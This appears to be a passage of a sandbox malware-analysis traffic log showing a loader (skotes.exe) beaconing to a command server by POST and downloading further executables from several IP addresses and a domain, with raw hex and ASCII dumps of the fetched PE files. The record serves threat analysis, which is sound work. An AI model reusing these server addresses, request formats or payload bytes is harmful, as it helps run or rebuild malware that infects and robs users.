                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:59.955764055 CET27192OUTData Raw: 2b 38 52 4f 66 33 6e 5c 2f 50 62 5c 2f 50 6f 65 74 51 6e 39 33 76 66 66 76 54 5c 2f 41 4a 35 5c 2f 39 4f 35 36 66 35 5c 2f 50 33 6f 41 32 50 74 2b 2b 50 2b 65 58 36 5c 2f 35 48 54 32 70 6e 2b 33 39 7a 39 66 38 41 50 5c 2f 31 73 2b 39 50 45 6e 33
                                                                                                                                                                                                                                                                          Data Ascii: +8ROf3n\/Pb\/PoetQn93vffvT\/AJ5\/9O56f5\/P3oA2Pt++P+eX6\/5HT2pn+39z9f8AP\/1s+9PEn3GH7mHzfK8v3\/z+dM2fK6I+zy\/9bn\/P\/wCs0HQEsj\/vgnl\/88v89z6UbkjV4N8m\/wA238ox\/wCf8nHSmSfvd+x9\/wCPf\/P+fV80jts+eN0\/zj+X+c1PsvKX3f8AAAZM3zZk+V45f3v2j\/lj\/T1+tQ
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:00.067878962 CET7416OUTData Raw: 6e 52 72 55 33 53 6f 31 4b 79 64 4b 45 32 36 71 61 63 31 79 36 4e 4d 5c 2f 52 33 39 69 6e 5c 2f 67 6e 68 38 63 76 32 67 50 69 74 34 6d 5c 2f 61 39 5c 2f 61 58 38 63 2b 4c 50 44 50 78 34 2b 46 58 37 58 48 67 2b 38 75 76 42 2b 75 36 50 4e 63 4e 71
                                                                                                                                                                                                                                                                          Data Ascii: nRrU3So1KydKE26qac1y6NM\/R39in\/gnh8cv2gPit4m\/a9\/aX8c+LPDPx4+FX7XHg+8uvB+u6PNcNqd78KvFfgzxl4tj1i4uyHTQ9W8PT2uifDMeHJV0PT9PtdPv7eXUPDs1hax\/jL\/wVN\/Z38YfEL\/goR+1X4v0qeNbDVfifcpAGt\/MI\/szR9I0iXL\/aY8\/v7CT+AY6c4yfp608XfEvXtS0\/RNL8RfEDX9b1e
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:00.233000994 CET1236OUTData Raw: 33 5c 2f 41 4a 31 54 38 76 62 47 6e 7a 6c 30 5c 2f 77 43 57 58 2b 50 35 30 65 7a 38 5c 2f 77 41 50 2b 43 64 41 66 64 32 4f 6b 58 79 52 38 5c 2f 36 72 38 7a 55 50 2b 73 79 37 76 76 45 66 37 33 46 78 4c 5c 2f 6e 75 65 6c 57 66 33 33 6c 50 5c 2f 77
                                                                                                                                                                                                                                                                          Data Ascii: 3\/AJ1T8vbGnzl0\/wCWX+P50ez8\/wAP+CdAfd2OkXyR8\/6r8zUP+sy7vvEf73FxL\/nuelWf33lP\/wAtj5Xlcf8APv16Y9qrSfvGw\/7p\/wDVf6o+fz6n\/wCtz\/LQ29\/+7+JDMySbPnjTzP8AVfuvI\/zx\/n1PLSRn3\/f\/AOef+ePofwqbbu3p\/qfM\/df898Y9R6e5pnl+Z\/BGm\/8A5d5P3HWgorDfl0Ece\
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:04.086766958 CET183INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.22.1
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:03 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Content-Length: 26
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Data Raw: 4d 63 72 53 4d 44 45 51 6c 69 73 57 33 63 46 71 31 37 33 34 37 34 30 31 30 32
                                                                                                                                                                                                                                                                          Data Ascii: McrSMDEQlisW3cFq1734740102


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          14192.168.2.549972185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:03.254467010 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018972001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:04.597975969 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:04 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          15192.168.2.54997531.41.244.11802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:04.830952883 CET61OUTGET /files/wicked/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.157449007 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:05 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 1114112
                                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 03:43:46 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "67639672-110000"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 95 63 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 cc 10 00 00 32 00 00 00 00 00 00 ee ea 10 00 00 20 00 00 00 00 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 ea 10 00 57 00 00 00 00 00 11 00 48 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$cg02 @ `@WH/@ H.text `.rsrcH/0@@.reloc@@BH<K`pY?F60584zc:VN01O*S~IpRiIPn}iJ!BH+o/Syj8T'}yIkD'$6}w[ )j[-0|ph\LRT~bKh"8s`)1 [i&9a?FN~_^Q43L@vxIB4|(~YLS;x)wv:2y%{3w)^7@7k
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.157490015 CET1236INData Raw: c5 aa 48 9b ae 70 7d f1 84 22 02 e3 af 25 ff 70 0b a7 0d f0 30 e9 b8 67 c4 33 a1 c7 f4 e2 67 07 b9 1d 13 d5 b0 15 b7 9a 9c f0 4c 20 85 a8 02 8b 95 86 b3 8e 7d 65 ab 63 4d 56 2e 77 fb 94 14 cb 5e 76 61 bc 07 61 d8 0e 44 fa a3 52 50 b7 c7 84 0f 72
                                                                                                                                                                                                                                                                          Data Ascii: Hp}"%p0g3gL }ecMV.w^vaaDRPr|>CNbYluH#61Z:';)5q2}KK'Rm!a;ijxL8MMWYbp{,mgT%(9<_{;
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.157526970 CET448INData Raw: 05 00 00 00 b9 00 00 00 1b 00 00 00 c6 ff ff ff 97 00 00 00 2e 00 00 00 6c 00 00 00 38 b4 00 00 00 11 06 1e 2f 08 20 0c d2 b0 d2 25 2b 06 20 34 8c 71 eb 25 26 2b b0 16 6a 0d 11 08 20 39 d6 68 ed 5a 20 3b 9a 58 f3 61 2b 9d 16 13 06 11 08 20 e5 18
                                                                                                                                                                                                                                                                          Data Ascii: .l8/ %+ 4q%&+j 9hZ ;Xa+ -0Z Ka++o&o Z <c_a8_X =Z fua8Fo 84nZ?_b` <oZ v^a8i+%sojY
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.157566071 CET1236INData Raw: 00 21 01 00 00 5f 01 00 00 38 03 00 00 8a 01 00 00 f9 01 00 00 d4 02 00 00 d9 01 00 00 38 12 04 00 00 16 13 04 11 0c 20 3c 79 c3 e2 5a 20 b7 80 4f 15 61 38 44 ff ff ff 11 04 6a 06 6e 32 08 20 0c 40 97 01 25 2b 06 20 4f e4 5e 15 25 26 38 29 ff ff
                                                                                                                                                                                                                                                                          Data Ascii: !_88 <yZ Oa8Djn2 @%+ O^%&8)/ 7%+ & &%&8aa Z ]a8, NZ a8aa hZ `Ba8X ~Z [Ba
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.157794952 CET1236INData Raw: 25 17 58 10 00 91 1f 18 62 60 13 04 7e 01 00 00 04 02 25 17 58 10 00 91 7e 01 00 00 04 02 25 17 58 10 00 91 1e 62 60 7e 01 00 00 04 02 25 17 58 10 00 91 1f 10 62 60 7e 01 00 00 04 02 25 17 58 10 00 91 1f 18 62 60 13 05 d0 01 00 00 1b 28 12 00 00
                                                                                                                                                                                                                                                                          Data Ascii: %Xb`~%X~%Xb`~%Xb`~%Xb`(o( J6Z a8 ?_ `Z a8~( Z a8nj3 7r%+ L%&8~Y(
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.157846928 CET448INData Raw: 61 38 68 fd ff ff 07 2a 00 13 30 08 00 00 03 00 00 04 00 00 11 02 20 c1 36 74 93 5a 20 cf 5e 4e d7 61 10 00 20 8c 8c 7a 92 20 f5 f7 b7 f8 61 25 13 07 1f 12 5e 45 12 00 00 00 eb 00 00 00 51 00 00 00 c7 01 00 00 06 01 00 00 05 00 00 00 f4 01 00 00
                                                                                                                                                                                                                                                                          Data Ascii: a8h*0 6tZ ^Na z a%^EQl]0n88 Z -vza+ E;Z @a8w ?_b 7Z a8V dZ ]a8;~
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.157928944 CET1236INData Raw: 11 06 16 11 04 1a 59 28 15 00 00 0a 11 07 20 12 3d ba 3e 5a 20 99 dd 12 ff 61 38 4a fe ff ff 7e 01 00 00 04 02 25 17 58 10 00 91 7e 01 00 00 04 02 25 17 58 10 00 91 1e 62 60 7e 01 00 00 04 02 25 17 58 10 00 91 1f 10 62 60 7e 01 00 00 04 02 25 17
                                                                                                                                                                                                                                                                          Data Ascii: Y( =>Z a8J~%X~%Xb`~%Xb`~%Xb` )Z ?a8nj3 ?7%+ $%&8~( Z Xra8(o( Z >Y'a8~%X~
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.158128977 CET224INData Raw: ff ff ff b5 00 00 00 90 00 00 00 97 02 00 00 15 00 00 00 f5 00 00 00 7c 02 00 00 38 92 02 00 00 11 07 20 08 ed 6e af 5a 20 53 79 c3 a4 61 2b 8e 7e 01 00 00 04 02 25 17 58 10 00 91 7e 01 00 00 04 02 25 17 58 10 00 91 1e 62 60 7e 01 00 00 04 02 25
                                                                                                                                                                                                                                                                          Data Ascii: |8 nZ Sya+~%X~%Xb`~%Xb`~%Xb` Z ka8>(o( LZ a8~Y( BEKZ a8~(
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.158159971 CET1236INData Raw: 00 00 0a 11 07 20 77 4a cb a3 5a 20 a6 f9 29 74 61 38 c8 fe ff ff 06 6e 16 6a 2e 08 20 f3 db 99 66 25 2b 06 20 eb 44 23 69 25 26 38 ae fe ff ff 02 20 ff ff ff 3f 5f 10 00 11 07 20 e2 30 7b eb 5a 20 69 c4 ba 23 61 38 92 fe ff ff 06 6e 17 6a 2e 08
                                                                                                                                                                                                                                                                          Data Ascii: wJZ )ta8nj. f%+ D#i%&8 ?_ 0{Z i#a8nj. bH%+ ~\M%&8x~%X~%Xb`~%Xb`~%Xb` nZ a8)~%X~%Xb`~%Xb`~%Xb`
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.158289909 CET1236INData Raw: 20 1f 91 29 48 25 2b 06 20 a6 c7 a0 52 25 26 2b c2 07 17 59 0b 08 20 87 f1 40 8a 5a 20 da c4 75 01 61 2b af 06 17 62 02 7b 04 00 00 04 06 8f 02 00 00 02 03 28 0a 00 00 06 58 0a 20 25 bc 71 5f 2b 91 08 20 0a b5 00 85 5a 20 e3 cb 8d 74 61 2b 82 06
                                                                                                                                                                                                                                                                          Data Ascii: )H%+ R%&+Y @Z ua+b{(X %q_+ Z ta+{_bY*0 # a%^E0aJ+ vZ [bma+{(b Y+{2 {%+ -%&+X
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.277152061 CET1236INData Raw: 00 13 30 03 00 07 00 00 00 01 00 00 11 02 28 19 00 00 0a 2a 00 13 30 05 00 43 01 00 00 08 00 00 11 02 20 c0 00 00 00 8d 02 00 00 02 7d 09 00 00 04 02 20 c0 00 00 00 8d 02 00 00 02 7d 0a 00 00 04 02 1f 0c 8d 02 00 00 02 7d 0b 00 00 04 02 1f 0c 8d
                                                                                                                                                                                                                                                                          Data Ascii: 0(*0C } }}}}}s }s&}s2}r}}s}s }s}( W) Ia%^EJ


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          16192.168.2.549977185.121.15.192806704C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:04.969542980 CET123OUTGET /zldPRFrmVFHTtKntGpOv1734579851?argument=McrSMDEQlisW3cFq1734740102 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: home.fivetk5ht.top
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.538458109 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.22.1
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:06 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 10816560
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="2QEtacHyJXtAjIXfSS;"
                                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 03:44:11 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          ETag: "1734579851.9291923-10816560-2974095529"
                                                                                                                                                                                                                                                                          Data Raw: 43 6e b9 73 e8 06 85 00 03 9d f1 44 4f d4 2a 88 21 04 ac 53 e5 65 e5 f8 bf 81 f9 ed af 8a 19 34 29 2d 35 35 ca 51 a3 c6 fa 72 39 4f 87 29 e9 fc a1 e6 79 df 5d d5 8b 59 90 72 e5 93 74 eb 85 53 0c b4 6c d7 35 26 ab a6 90 a1 b5 eb b7 a9 23 82 8c 84 f4 2e 0b fa 65 06 8d 2c 5c a7 1c 0a 83 50 8c 81 98 49 8b 04 a8 21 03 99 5b 44 18 fd 80 55 2d 82 9d b6 fb 4b 63 52 18 b4 71 54 20 7c 94 c1 86 d9 34 33 36 df de 89 63 c9 3b 71 a7 da 02 0d 89 96 a9 5e 28 8f 6d 1e 31 4c e9 81 7e 48 1b 9a a2 24 0d 94 5b 49 09 5d f2 82 57 a7 e0 4c a1 54 ad 91 7f 16 85 ea 25 3a a7 9c cc 77 9c 59 2a 15 02 86 d0 49 18 ae 03 35 a0 fe b1 9d 8b a8 a9 50 c4 c7 36 19 a6 08 7b 5b c7 5a 05 b3 52 19 8e e9 76 61 c0 13 98 7a e4 12 b4 3e ed 2a 27 a6 ef a2 4a 7a be 30 0a 4a 3f 4b ef 76 8d 82 73 ac b5 71 5c b9 b2 6a 7d 15 a8 94 51 11 6d c2 8a ec a1 fb d0 35 3e 2c 4c 2d 2c 78 78 7a 54 c2 05 1c 5d 58 69 0f 5f ff 4a 6a 4f 17 c5 e1 bb 5c 45 3a 15 28 ac 5e 0d 95 d9 a0 8c ad 2d 74 9a 69 c1 ac 6e ea d3 6b f3 b7 70 0e 40 ed e0 34 15 4a 31 89 25 eb d8 df [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: CnsDO*!Se4)-55Qr9O)y]YrtSl5&#.e,\PI![DU-KcRqT |436c;q^(m1L~H$[I]WLT%:wY*I5P6{[ZRvaz>*'Jz0J?Kvsq\j}Qm5>,L-,xxzT]Xi_JjO\E:(^-tinkp@4J1%Ef!wrvX{m*B_b2N5U3\CeBWr|s$9.Y,M@qbwPx.T N~L9iRYS,bzfr+6tisA?G1:8lrhS|!8M`<.MpxvG1N9tR!rbV],c)a,rk?AD:2V&P/\@2Rfg?]Booydm_Kl&5KOC%Z6K.D0y6YYj2>E{sS'>u/`s$@s$Wq8I?QKhxTpgwaCWMAsE&W?oOn.d\vsdudNl E=d"5S=aDp!@wuMu$RCApM(UuEAA (y;
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.538506031 CET1236INData Raw: 99 c8 66 50 7c a1 c2 73 ce f1 36 9e a8 73 6f 92 ea 31 94 ed 15 86 a3 ac cb 21 e0 d6 65 79 bb 0e db 86 1d e0 96 67 16 a2 a4 e0 91 1c 70 41 4d b7 c2 02 ef a3 99 60 b7 0c bd a2 33 d9 95 31 c6 7d 7c ce aa ca 32 28 37 73 37 5a 2d 14 f8 7e df 1e d5 8c
                                                                                                                                                                                                                                                                          Data Ascii: fP|s6so1!eygpAM`31}|2(7s7Z-~_ir1b5<\I5<+4~CjhlU\p<@GGb2OA@q>Q)NLajz]- 9QRN9r_12n@o0FZe3mv
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.538520098 CET1236INData Raw: 0e c7 fc 3f c6 a8 39 42 05 0a 48 82 29 91 14 ff 39 a9 4f 86 0f 93 ab fb 5a 50 fa bc e1 cc e9 35 3b b0 47 03 72 41 36 60 bb 9c ce 72 bf 4d f6 18 90 15 d9 8e 4d ca d8 2f 7a 2b 8f 85 df fe e2 88 b6 33 28 d8 1e 8c d5 d2 ad 39 99 88 25 d6 78 5a ca 9b
                                                                                                                                                                                                                                                                          Data Ascii: ?9BH)9OZP5;GrA6`rMM/z+3(9%xZz;k*rqt,y2(hm^8&z]b*)cc=EJfzIedI+*qGkdWl]9e!oo'cO:;B++F
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.538662910 CET1236INData Raw: d7 5f 18 12 44 06 ea 06 91 13 7c 6b 53 fc 20 a7 9c 5c 97 6a 74 a3 f6 f9 19 48 27 b6 e4 a2 45 ca 82 cb bd 28 87 50 68 b9 47 42 9e e6 f9 a1 d7 7e 99 f2 59 33 b0 fa 30 2f 93 e2 d8 ea d5 70 d6 ae 1e ec c9 66 0b 17 17 ec 76 db 8d 01 ff cc 5f dd 4b e3
                                                                                                                                                                                                                                                                          Data Ascii: _D|kS \jtH'E(PhGB~Y30/pfv_Ku9meW*r5d\ek;.W}BvM_bjZnQ4+ZA^[^3n`H%'NHdoS["]lM.I( xA:h
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.538676023 CET1236INData Raw: 49 73 67 46 b4 f3 56 b4 c3 19 f0 ab 8a fe 4b e3 2f 1c b5 d1 eb aa e1 e1 c8 8d cd d9 62 f1 76 3c 42 20 39 09 62 3b fd df 98 a7 2b b8 af 8b 5d e8 e7 78 89 6a 65 2d 3b 7b d9 34 e5 15 c8 17 e3 fb 00 2d 56 ea c8 69 92 3c 85 12 1a 3c 06 56 88 14 c7 85
                                                                                                                                                                                                                                                                          Data Ascii: IsgFVK/bv<B 9b;+]xje-;{4-Vi<<VL+6'j*Zik8$YA{#68GKCFTK$]6oQ5CBmTKXF}('Cb;8n6RuyDvI6qI[|L!'8fWd9tjE
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.538811922 CET1236INData Raw: e4 83 76 74 ef e8 c5 96 ef fe 6d a6 77 76 38 8b f7 5b ca b3 ee 69 19 20 34 70 f8 cb 4a a5 05 d7 85 0e fa 37 82 63 93 0b 2c 21 cf c7 f8 59 57 0e 39 7b cb 10 91 d2 e0 76 35 f8 88 ed 1f a1 35 9c e0 08 88 52 34 ef da 19 8b 75 55 1b 28 79 c4 d9 da 15
                                                                                                                                                                                                                                                                          Data Ascii: vtmwv8[i 4pJ7c,!YW9{v55R4uU(y-fgm*A\1:p831`jI4FAb.)w1z<{u~4;h"Fb*D(<'"|lxVVmRkO(0M-roO+p`W
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.538822889 CET1236INData Raw: 92 aa 97 67 b9 4b 13 c6 58 03 21 00 d2 9e 53 19 79 dd 35 49 7a 86 f5 b8 44 65 f6 03 3f a8 3a ad 55 fd 84 4f e4 31 9b 10 53 c5 0a 20 ee 3b 9c 9f 62 9d 3d c6 2f e5 0b 2e 50 b1 a6 a2 53 22 69 21 9a 0b d8 99 4d f0 6c 34 01 4d d4 50 2e 9d 00 d1 72 eb
                                                                                                                                                                                                                                                                          Data Ascii: gKX!Sy5IzDe?:UO1S ;b=/.PS"i!Ml4MP.r+d&woRDl}D0Hiw<`zt-R6i}p>..P/\IP=o"BP9&7\;~e=fe#We+RwiSq@28rALw[uBT.9
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.538836002 CET1236INData Raw: ec 91 8e 34 6c 75 8f d4 5a 7e 3f 04 cd a5 5c 4b 8b 15 d8 b4 75 e5 e7 50 65 ab e4 92 60 8c a3 5e 3c af 4f 74 38 e8 4e b8 b6 b3 05 de ba f1 d2 ee 04 f2 2b d3 21 90 9f db 6e a9 4d 5d 0b 17 83 aa a9 b4 76 85 5a a7 cf be 83 43 be 0c ee f7 69 10 65 e9
                                                                                                                                                                                                                                                                          Data Ascii: 4luZ~?\KuPe`^<Ot8N+!nM]vZCie&54oqni1pvz%oN=)TcIqA||hG/l,8&0o[+U` HaSC*[#pNFpFzM!n:qn-d
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.538846970 CET332INData Raw: ba 28 75 53 19 a2 84 73 7b 2a 15 5a 63 46 d5 dd 86 fa 0d 4d fc 49 16 a6 72 d1 21 28 a1 ec 34 d0 15 14 33 ae 39 bd 8e 16 a9 04 aa bf db ea 51 b4 47 37 91 73 25 3d 35 e2 59 03 92 3c d2 6a 45 4a 0e 79 33 2f b2 59 a0 d7 0c eb d3 d0 97 64 b4 54 21 c6
                                                                                                                                                                                                                                                                          Data Ascii: (uSs{*ZcFMIr!(439QG7s%=5Y<jEJy3/YdT!NbrJv_aB_D/9xZ"}D5"pPo>G4}[u'i{{HNYjsD#NXA)HQ?I,66lLj
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.538997889 CET1236INData Raw: e6 05 ac 11 d7 3c 03 3f 56 4e 45 bb 9d fb 36 37 da d5 46 76 32 a7 cb b5 cf 2f ee 22 e0 96 00 37 5a 01 b3 0a c2 7b f5 3d 16 6d de 82 2f 19 25 1a 54 04 9d 5a 29 99 fb 91 d7 cb c0 23 cd ab 45 cb 50 fc ae 0f 7c 64 db 22 f0 d0 54 30 f1 40 c9 ae c4 3a
                                                                                                                                                                                                                                                                          Data Ascii: <?VNE67Fv2/"7Z{=m/%TZ)#EP|d"T0@:aXG'3H>8OTyr.bi[@xp3gd-7t,pEN4?xe{xy?^OXqw.)<A'>c9$WVcP>
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:06.658142090 CET1236INData Raw: db 3e ba 4e eb bd 3a aa eb 1a b0 29 aa 91 c4 c4 25 02 98 30 48 c8 8b bd 18 8a 04 2b a2 da 84 79 9b ee 2d 7c 92 82 6b 55 4a 21 d6 62 f7 ec 5d 7f 6d 47 25 08 f8 d8 71 d3 36 88 af 0a 60 29 c5 28 07 6e 5f 99 78 b5 b4 64 f0 a9 dd df be b1 93 bd 70 a3
                                                                                                                                                                                                                                                                          Data Ascii: >N:)%0H+y-|kUJ!b]mG%q6`)(n_xdpS7tCf3RVcm 6JZERMe]_JHS3EJ/tz,K|L"cbHO(0ISf9UcjP"$2VVT\wAb_"i~&xZsn%iL~


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          17192.168.2.550008185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:10.756987095 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 37 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018973001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:12.148761988 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:11 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          18192.168.2.55001531.41.244.11802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:12.276812077 CET59OUTGET /files/karl/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 31.41.244.11


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          19192.168.2.55002131.41.244.11802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:13.442234039 CET59OUTGET /files/karl/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:14.843096972 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:14 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 22016
                                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 14:25:14 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "67642cca-5600"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
